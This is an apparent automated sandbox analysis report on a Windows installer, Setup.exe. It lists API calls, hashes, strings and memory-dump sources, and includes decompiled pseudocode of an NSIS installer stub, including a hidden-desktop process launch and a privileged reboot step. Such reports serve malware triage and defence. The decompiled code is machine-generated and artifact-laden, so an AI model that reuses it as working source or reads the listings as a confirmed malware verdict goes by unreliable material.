                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterInitialize$Leave
                                                                                                                • String ID:
                                                                                                                • API String ID: 713024617-0
                                                                                                                • Opcode ID: 3c05c5cf855e72449ebb35b1bef8e2cf63c74bf4d1e7af5844702d4caa69ab0c
                                                                                                                • Instruction ID: b76e858e2b5aaeca63bebd44e116d5b98294e054f0247178d4e15a1ed9cde8f7
                                                                                                                • Opcode Fuzzy Hash: 3c05c5cf855e72449ebb35b1bef8e2cf63c74bf4d1e7af5844702d4caa69ab0c
                                                                                                                • Instruction Fuzzy Hash: F0F03672911319AFDE612F6CEC4DBBE766CEB5337EF814059F50181146C772C8888B99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01270743, Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(01389E70,?,?,00000000,?,012706ED,?,00000004,012692B4,01266D6E,012692DD,01266B4B,01296BCA,?,?,00000000), ref: 0127074F
                                                                                                                • TlsGetValue.KERNEL32(01389E54,?,?,00000000,?,012706ED,?,00000004,012692B4,01266D6E,012692DD,01266B4B,01296BCA,?,?,00000000), ref: 01270763
                                                                                                                • LeaveCriticalSection.KERNEL32(01389E70,?,?,00000000,?,012706ED,?,00000004,012692B4,01266D6E,012692DD,01266B4B,01296BCA,?,?,00000000), ref: 01270779
                                                                                                                • LeaveCriticalSection.KERNEL32(01389E70,?,?,00000000,?,012706ED,?,00000004,012692B4,01266D6E,012692DD,01266B4B,01296BCA,?,?,00000000), ref: 01270784
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Leave$EnterValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3969253408-0
                                                                                                                • Opcode ID: 03bf13a34752072a5208728ba0485fb638fd5eb668ba898a9055fe184eab6afb
                                                                                                                • Instruction ID: e423dcab9165168b0e5b989d20d66fca78ed2e7286f9bcf264b494a764eb18c4
                                                                                                                • Opcode Fuzzy Hash: 03bf13a34752072a5208728ba0485fb638fd5eb668ba898a9055fe184eab6afb
                                                                                                                • Instruction Fuzzy Hash: 6AF0BE326101209FDF21AF5CE88D87BFBA8EF4662030540AEFD04EB155C2B0E8458BA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Analysis Process: Setup.exe PID: 6668 Parent PID: 4576 Setup.exeCOMMON

                                                                                                                Executed Functions

                                                                                                                Function 6FEA4C20, Relevance: 95.0, APIs: 32, Strings: 22, Instructions: 532memorythreadsleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 6FEA47D0: _DebugHeapAllocator.LIBCPMTD ref: 6FEA482D
                                                                                                                  • Part of subcall function 6FEA47D0: PathFileExistsW.SHLWAPI(00000000,?,?,?,3A83C854), ref: 6FEA4BB9
                                                                                                                  • Part of subcall function 6FEA47D0: _DebugHeapAllocator.LIBCPMTD ref: 6FEA4BDF
                                                                                                                  • Part of subcall function 6FEA8FF0: _DebugHeapAllocator.LIBCPMTD ref: 6FEA9045
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEA4CFD
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEA4D4B
                                                                                                                • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FEA4D56
                                                                                                                • std::ios_base::good.LIBCPMTD ref: 6FEA4D5D
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000104,00000104,?), ref: 6FEA4D8C
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEA4DA3
                                                                                                                • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FEA4DB7
                                                                                                                • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FEA4DD9
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6FEA4E8F
                                                                                                                • GetThreadDesktop.USER32(00000000,?,00000000,?,?), ref: 6FEA4E96
                                                                                                                • CreateDesktopW.USER32 ref: 6FEA4EB1
                                                                                                                  • Part of subcall function 6FEB1050: _DebugHeapAllocator.LIBCPMTD ref: 6FEB10C6
                                                                                                                  • Part of subcall function 6FEB1050: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FEB10D2
                                                                                                                  • Part of subcall function 6FEB1050: std::ios_base::good.LIBCPMTD ref: 6FEB10DA
                                                                                                                • SetThreadDesktop.USER32(00000000,?,00000000,?,?), ref: 6FEA4F13
                                                                                                                • GetLastError.KERNEL32(?,00000000,?,?), ref: 6FEA4F1D
                                                                                                                • CloseDesktop.USER32(00000000,?,00000000,?,?), ref: 6FEA4F2A
                                                                                                                • CreateProcessW.KERNEL32 ref: 6FEA4F9F
                                                                                                                • GetLastError.KERNEL32(?,00000000,?,?), ref: 6FEA4FA9
                                                                                                                • CloseDesktop.USER32(00000000,?,00000000,?,?), ref: 6FEA4FBE
                                                                                                                • CloseHandle.KERNEL32(00000564,?,00000000,?,?), ref: 6FEA501D
                                                                                                                • CreateJobObjectW.KERNEL32 ref: 6FEA502A
                                                                                                                • AssignProcessToJobObject.KERNEL32 ref: 6FEA5040
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEA50C1
                                                                                                                • Sleep.KERNEL32(?,6FF0E520,00000000,00000000,?,?), ref: 6FEA50D1
                                                                                                                • GetLastError.KERNEL32(?,00000000,?,?), ref: 6FEA4EC0
                                                                                                                  • Part of subcall function 6FEA5840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6FEA584A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocatorDebugHeap$Base::Concurrency::details::ContextDesktopIdentityQueueWork$CloseCreateErrorLastThread$ObjectProcessstd::ios_base::good$AssignCurrentEnvironmentExistsExpandFileHandlePathSleepStrings
                                                                                                                • String ID: "%s" %s$%s %s$.msi$<8o$C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibInstaller\Install.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibInstaller\Install.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibInstaller\Install.cpp$D$[SystemFolder]msiexec.exe /i "%s"$failed: %s$ignore action failure and continue installation$ignoreFailure$keepProcessAlive$process terminated$process was completed with exit code: %d$sib$start : %s$starting UI Script$step#%d: %s %s %s$timeout %d min. was reached but the process still active.$uiScriptTest$waitTimeout
                                                                                                                • API String ID: 813913006-3474974308
                                                                                                                • Opcode ID: 982462898f4c7912f4158c42c1ee1960b393b18c5a822670400c95efa1865d2f
                                                                                                                • Instruction ID: 847ff2d0371b85c86c0b1742a5df2babf81c4397dfe1884ddf135a4b56f24ca7
                                                                                                                • Opcode Fuzzy Hash: 982462898f4c7912f4158c42c1ee1960b393b18c5a822670400c95efa1865d2f
                                                                                                                • Instruction Fuzzy Hash: 3B227AB0D14348EBDB04DBA8DCA4BEEBFB4AF45308F24415DE405AF281DB766A44CB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004038AF, Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 84%
                                                                                                                			_entry_() {
				struct _SHFILEINFOW _v700;
				struct _SECURITY_ATTRIBUTES* _v716;
				struct _SECURITY_ATTRIBUTES* _v720;
				WCHAR* _v724;
				char _v736;
				signed int _v740;
				signed int _v744;
				struct _SECURITY_ATTRIBUTES* _v748;
				intOrPtr _v752;
				int _v756;
				intOrPtr _v760;
				struct _SECURITY_ATTRIBUTES* _v764;
				void* _v772;
				int _t34;
				short* _t42;
				signed int _t45;
				WCHAR* _t47;
				WCHAR* _t49;
				void* _t54;
				intOrPtr _t56;
				signed int _t58;
				void* _t73;
				int _t79;
				WCHAR* _t83;
				WCHAR* _t92;
				void* _t99;
				signed int _t100;
				signed int _t101;
				void* _t102;
				WCHAR* _t103;
				void* _t104;
				void* _t106;
				WCHAR* _t107;
				void* _t108;
				WCHAR* _t109;
				WCHAR* _t112;
				WCHAR* _t114;
				void* _t117;
				void* _t118;

				_t117 =  &_v724;
				_t108 = 0x20;
				_v716 = 0;
				_v724 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v720 = 0;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x47eb98 = _t34;
				 *0x47eab0 = E00406328(8);
				SHGetFileInfoW(0x40a264, 0,  &_v700, 0x2b4, 0); // executed
				E00406035(0x476aa0, L"NSIS Error");
				E00406035(0x4cf0a0, GetCommandLineW());
				 *0x47eab8 = GetModuleHandleW(0);
				_t42 = 0x4cf0a0;
				if( *0x4cf0a0 == 0x22) {
					_t108 = 0x22;
					_t42 = 0x4cf0a2;
				}
				_t109 = CharNextW(E00405D32(_t42, _t108));
				_v744 = _t109;
				while(1) {
					_t45 =  *_t109 & 0x0000ffff;
					_t120 = _t45;
					if(_t45 == 0) {
						break;
					}
					_t102 = 0x20;
					__eflags = _t45 - _t102;
					if(_t45 != _t102) {
						L5:
						__eflags =  *_t109 - 0x22;
						if( *_t109 == 0x22) {
							_t109 =  &(_t109[1]);
							__eflags = _t109;
							_t102 = 0x22;
						}
						__eflags =  *_t109 - 0x2f;
						if( *_t109 != 0x2f) {
							L17:
							_t109 = E00405D32(_t109, _t102);
							__eflags =  *_t109 - 0x22;
							if(__eflags == 0) {
								_t109 =  &(_t109[1]);
								__eflags = _t109;
							}
							continue;
						}
						_t109 =  &(_t109[1]);
						__eflags =  *_t109 - 0x53;
						if( *_t109 != 0x53) {
							L12:
							_t47 = E0040382C(_t109, L"NCRC", 4);
							_t118 = _t117 + 0xc;
							__eflags = _t47;
							if(_t47 != 0) {
								L16:
								_t12 = _t109 - 4; // -6
								_t49 = E0040382C(_t12, L" /D=", 4);
								_t117 = _t118 + 0xc;
								__eflags = _t49;
								if(_t49 == 0) {
									_t13 = _t109 - 4; // -6
									E0040824C(_t13, 0, 8);
									_t117 = _t117 + 0xc;
									__eflags =  &(_t109[2]);
									E00406035(0x4d30a8,  &(_t109[2]));
									break;
								}
								goto L17;
							}
							_t100 = _t109[4] & 0x0000ffff;
							__eflags = _t100 - 0x20;
							if(_t100 == 0x20) {
								L15:
								_t10 =  &_v744;
								 *_t10 = _v744 | 0x00000004;
								__eflags =  *_t10;
								goto L16;
							}
							__eflags = _t100;
							if(_t100 != 0) {
								goto L16;
							}
							goto L15;
						}
						_t101 = _t109[1] & 0x0000ffff;
						__eflags = _t101 - 0x20;
						if(_t101 == 0x20) {
							L11:
							_t7 =  &_v744;
							 *_t7 = _v744 | 0x00000002;
							__eflags =  *_t7;
							goto L12;
						}
						__eflags = _t101;
						if(_t101 != 0) {
							goto L12;
						}
						goto L11;
					} else {
						goto L4;
					}
					do {
						L4:
						_t109 =  &(_t109[1]);
						__eflags =  *_t109 - _t102;
					} while ( *_t109 == _t102);
					goto L5;
				}
				_t103 = 0x4e30c8;
				GetTempPathW(0x2004, 0x4e30c8);
				_t54 = E004037F8(_t104, _t120);
				_t121 = _t54;
				if(_t54 != 0) {
					L24:
					DeleteFileW(0x4df0c0); // executed
					_t56 = E004035B3(_t122, _v744); // executed
					_v752 = _t56;
					if(_t56 != 0) {
						L34:
						E00403885(); // executed
						__imp__OleUninitialize(); // executed
						if(_v748 == 0) {
							__eflags =  *0x47eb74;
							if( *0x47eb74 != 0) {
								_t103 = E00406328(3);
								_t112 = E00406328(4);
								_t107 = E00406328(5);
								__eflags = _t103;
								if(_t103 != 0) {
									__eflags = _t112;
									if(_t112 != 0) {
										__eflags = _t107;
										if(_t107 != 0) {
											_t83 =  *_t103(GetCurrentProcess(), 0x28,  &_v736);
											__eflags = _t83;
											if(_t83 != 0) {
												 *_t112(0, L"SeShutdownPrivilege",  &_v740);
												_v756 = 1;
												_v744 = 2;
												 *_t107(_v760, 0,  &_v756, 0, 0, 0);
											}
										}
									}
								}
								_t79 = ExitWindowsEx(2, 0);
								__eflags = _t79;
								if(_t79 == 0) {
									E0040141D(9);
								}
							}
							_t58 =  *0x47eb8c;
							__eflags = _t58 - 0xffffffff;
							if(_t58 != 0xffffffff) {
								_v740 = _t58;
							}
							_push(_v740);
						} else {
							E00405CCC(_v748, 0x200010);
							_push(2); // executed
						}
						ExitProcess(); // executed
					}
					if( *0x47eb04 == 0) {
						L33:
						 *0x47eb8c =  *0x47eb8c | 0xffffffff;
						_v740 = E00405958(_t104);
						E00406113(_t104, 1);
						goto L34;
					}
					_t114 = E00405D32(0x4cf0a0, 0);
					while(_t114 >= 0x4cf0a0) {
						_t92 = E0040382C(_t114, L" _?=", 4);
						_t117 = _t117 + 0xc;
						__eflags = _t92;
						if(__eflags == 0) {
							break;
						}
						_t114 = _t114 - 2;
						__eflags = _t114;
					}
					_v748 = L"Error launching installer";
					_t126 = _t114 - 0x4cf0a0;
					if(_t114 < 0x4cf0a0) {
						lstrcatW(_t103, L"~nsu.tmp");
						if(lstrcmpiW(_t103, 0x4db0b8) == 0) {
							goto L34;
						}
						CreateDirectoryW(_t103, 0);
						SetCurrentDirectoryW(_t103);
						if( *0x4d30a8 == 0) {
							E00406035(0x4d30a8, 0x4db0b8);
						}
						E00406035(0x47f000, _v736);
						E00406035(0x483008, "A");
						_t106 = 0x1a;
						do {
							E00406831(_t103, _t106, 0x43dd40, 0x43dd40,  *((intOrPtr*)( *0x47eabc + 0x120)));
							DeleteFileW(0x43dd40);
							if(_v756 != 0 && CopyFileW(0x4eb0d8, 0x43dd40, 1) != 0) {
								E00406C94(0x43dd40, 0);
								E00406831(_t103, _t106, 0x43dd40, 0x43dd40,  *((intOrPtr*)( *0x47eabc + 0x124)));
								_t73 = E00405C6B(0x43dd40);
								if(_t73 != 0) {
									CloseHandle(_t73);
									_v748 = 0;
								}
							}
							 *0x483008 =  *0x483008 + 1;
							_t106 = _t106 - 1;
						} while (_t106 != 0);
						E00406C94(_t103, 0);
						goto L34;
					}
					 *_t114 = 0;
					_t115 =  &(_t114[4]);
					if(E004067AA(_t126,  &(_t114[4])) == 0) {
						goto L34;
					}
					E00406035(0x4d30a8, _t115);
					E00406035(0x4d70b0, _t115);
					_v764 = 0;
					goto L33;
				}
				GetWindowsDirectoryW(0x4e30c8, 0x1fff);
				lstrcatW(0x4e30c8, L"\\Temp");
				_t99 = E004037F8(_t104, _t121);
				_t122 = _t99;
				if(_t99 == 0) {
					goto L34;
				}
				goto L24;
			}










































                                                                                                                0x004038af
                                                                                                                0x004038bd
                                                                                                                0x004038be
                                                                                                                0x004038c2
                                                                                                                0x004038ca
                                                                                                                0x004038ce
                                                                                                                0x004038d9
                                                                                                                0x004038e0
                                                                                                                0x004038e8
                                                                                                                0x004038f8
                                                                                                                0x00403908
                                                                                                                0x00403918
                                                                                                                0x0040392a
                                                                                                                0x0040393e
                                                                                                                0x00403943
                                                                                                                0x00403945
                                                                                                                0x00403949
                                                                                                                0x0040394a
                                                                                                                0x0040394a
                                                                                                                0x0040395d
                                                                                                                0x0040395f
                                                                                                                0x004039f6
                                                                                                                0x004039f6
                                                                                                                0x004039f9
                                                                                                                0x004039fc
                                                                                                                0x00403a02
                                                                                                                0x00403a02
                                                                                                                0x0040396a
                                                                                                                0x0040396b
                                                                                                                0x0040396e
                                                                                                                0x00403978
                                                                                                                0x00403978
                                                                                                                0x0040397c
                                                                                                                0x00403980
                                                                                                                0x00403980
                                                                                                                0x00403983
                                                                                                                0x00403983
                                                                                                                0x00403984
                                                                                                                0x00403988
                                                                                                                0x004039e4
                                                                                                                0x004039eb
                                                                                                                0x004039ed
                                                                                                                0x004039f1
                                                                                                                0x004039f3
                                                                                                                0x004039f3
                                                                                                                0x004039f3
                                                                                                                0x00000000
                                                                                                                0x004039f1
                                                                                                                0x0040398a
                                                                                                                0x0040398d
                                                                                                                0x00403991
                                                                                                                0x004039a6
                                                                                                                0x004039ae
                                                                                                                0x004039b3
                                                                                                                0x004039b6
                                                                                                                0x004039b8
                                                                                                                0x004039cd
                                                                                                                0x004039cf
                                                                                                                0x004039d8
                                                                                                                0x004039dd
                                                                                                                0x004039e0
                                                                                                                0x004039e2
                                                                                                                0x00403a06
                                                                                                                0x00403a0b
                                                                                                                0x00403a10
                                                                                                                0x00403a13
                                                                                                                0x00403a1c
                                                                                                                0x00000000
                                                                                                                0x00403a1c
                                                                                                                0x00000000
                                                                                                                0x004039e2
                                                                                                                0x004039ba
                                                                                                                0x004039be
                                                                                                                0x004039c1
                                                                                                                0x004039c8
                                                                                                                0x004039c8
                                                                                                                0x004039c8
                                                                                                                0x004039c8
                                                                                                                0x00000000
                                                                                                                0x004039c8
                                                                                                                0x004039c3
                                                                                                                0x004039c6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004039c6
                                                                                                                0x00403993
                                                                                                                0x00403997
                                                                                                                0x0040399a
                                                                                                                0x004039a1
                                                                                                                0x004039a1
                                                                                                                0x004039a1
                                                                                                                0x004039a1
                                                                                                                0x00000000
                                                                                                                0x004039a1
                                                                                                                0x0040399c
                                                                                                                0x0040399f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403970
                                                                                                                0x00403970
                                                                                                                0x00403970
                                                                                                                0x00403973
                                                                                                                0x00403973
                                                                                                                0x00000000
                                                                                                                0x00403970
                                                                                                                0x00403a21
                                                                                                                0x00403a2c
                                                                                                                0x00403a32
                                                                                                                0x00403a37
                                                                                                                0x00403a39
                                                                                                                0x00403a5f
                                                                                                                0x00403a64
                                                                                                                0x00403a6e
                                                                                                                0x00403a73
                                                                                                                0x00403a79
                                                                                                                0x00403af8
                                                                                                                0x00403af8
                                                                                                                0x00403afd
                                                                                                                0x00403b07
                                                                                                                0x00403bfa
                                                                                                                0x00403c00
                                                                                                                0x00403c0b
                                                                                                                0x00403c14
                                                                                                                0x00403c1b
                                                                                                                0x00403c1d
                                                                                                                0x00403c1f
                                                                                                                0x00403c21
                                                                                                                0x00403c23
                                                                                                                0x00403c25
                                                                                                                0x00403c27
                                                                                                                0x00403c37
                                                                                                                0x00403c39
                                                                                                                0x00403c3b
                                                                                                                0x00403c48
                                                                                                                0x00403c57
                                                                                                                0x00403c5f
                                                                                                                0x00403c67
                                                                                                                0x00403c67
                                                                                                                0x00403c3b
                                                                                                                0x00403c27
                                                                                                                0x00403c23
                                                                                                                0x00403c6c
                                                                                                                0x00403c72
                                                                                                                0x00403c74
                                                                                                                0x00403c78
                                                                                                                0x00403c78
                                                                                                                0x00403c74
                                                                                                                0x00403c7d
                                                                                                                0x00403c82
                                                                                                                0x00403c85
                                                                                                                0x00403c87
                                                                                                                0x00403c87
                                                                                                                0x00403c8b
                                                                                                                0x00403b0d
                                                                                                                0x00403b16
                                                                                                                0x00403b1b
                                                                                                                0x00403b1b
                                                                                                                0x00403b1d
                                                                                                                0x00403b1d
                                                                                                                0x00403a81
                                                                                                                0x00403ae1
                                                                                                                0x00403ae1
                                                                                                                0x00403aef
                                                                                                                0x00403af3
                                                                                                                0x00000000
                                                                                                                0x00403af3
                                                                                                                0x00403a8a
                                                                                                                0x00403aa5
                                                                                                                0x00403a96
                                                                                                                0x00403a9b
                                                                                                                0x00403a9e
                                                                                                                0x00403aa0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403aa2
                                                                                                                0x00403aa2
                                                                                                                0x00403aa2
                                                                                                                0x00403aa9
                                                                                                                0x00403ab1
                                                                                                                0x00403ab3
                                                                                                                0x00403b29
                                                                                                                0x00403b3d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403b41
                                                                                                                0x00403b48
                                                                                                                0x00403b55
                                                                                                                0x00403b5d
                                                                                                                0x00403b5d
                                                                                                                0x00403b6b
                                                                                                                0x00403b7a
                                                                                                                0x00403b81
                                                                                                                0x00403b87
                                                                                                                0x00403b93
                                                                                                                0x00403b99
                                                                                                                0x00403ba3
                                                                                                                0x00403bb9
                                                                                                                0x00403bca
                                                                                                                0x00403bd0
                                                                                                                0x00403bd7
                                                                                                                0x00403bda
                                                                                                                0x00403be0
                                                                                                                0x00403be0
                                                                                                                0x00403bd7
                                                                                                                0x00403be4
                                                                                                                0x00403beb
                                                                                                                0x00403beb
                                                                                                                0x00403bf0
                                                                                                                0x00000000
                                                                                                                0x00403bf0
                                                                                                                0x00403ab7
                                                                                                                0x00403aba
                                                                                                                0x00403ac5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403acd
                                                                                                                0x00403ad8
                                                                                                                0x00403add
                                                                                                                0x00000000
                                                                                                                0x00403add
                                                                                                                0x00403a41
                                                                                                                0x00403a4d
                                                                                                                0x00403a52
                                                                                                                0x00403a57
                                                                                                                0x00403a59
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • #17.COMCTL32 ref: 004038CE
                                                                                                                • SetErrorMode.KERNEL32(00008001), ref: 004038D9
                                                                                                                • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                  • Part of subcall function 00406328: LoadLibraryA.KERNEL32(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                • DeleteFileW.KERNEL32(004DF0C0), ref: 00403A64
                                                                                                                • OleUninitialize.OLE32(?), ref: 00403AFD
                                                                                                                • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                • ExitWindowsEx.USER32 ref: 00403C6C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                • API String ID: 2435955865-3712954417
                                                                                                                • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEE0F62, Relevance: 45.8, APIs: 23, Strings: 3, Instructions: 309fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 6FEE0FC1
                                                                                                                • GetLastError.KERNEL32 ref: 6FEE0FD4
                                                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 6FEE1020
                                                                                                                • GetLastError.KERNEL32 ref: 6FEE102A
                                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 6FEE1071
                                                                                                                • GetLastError.KERNEL32 ref: 6FEE107B
                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,*.*,?), ref: 6FEE10C9
                                                                                                                • GetLastError.KERNEL32 ref: 6FEE10DA
                                                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?), ref: 6FEE11AC
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 6FEE11C0
                                                                                                                • GetTempFileNameW.KERNEL32(?,DEL,00000000,?), ref: 6FEE11E9
                                                                                                                • MoveFileExW.KERNEL32(?,?,00000001), ref: 6FEE120C
                                                                                                                • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 6FEE1225
                                                                                                                • FindNextFileW.KERNELBASE(000000FF,?,?,?,?), ref: 6FEE1235
                                                                                                                • GetLastError.KERNEL32 ref: 6FEE124A
                                                                                                                • GetLastError.KERNEL32 ref: 6FEE1279
                                                                                                                • GetLastError.KERNEL32 ref: 6FEE129B
                                                                                                                • GetLastError.KERNEL32 ref: 6FEE12BD
                                                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 6FEE12C7
                                                                                                                • GetLastError.KERNEL32 ref: 6FEE12D1
                                                                                                                • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 6FEE12F5
                                                                                                                • GetLastError.KERNEL32 ref: 6FEE1310
                                                                                                                • FindClose.KERNEL32(000000FF), ref: 6FEE1346
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
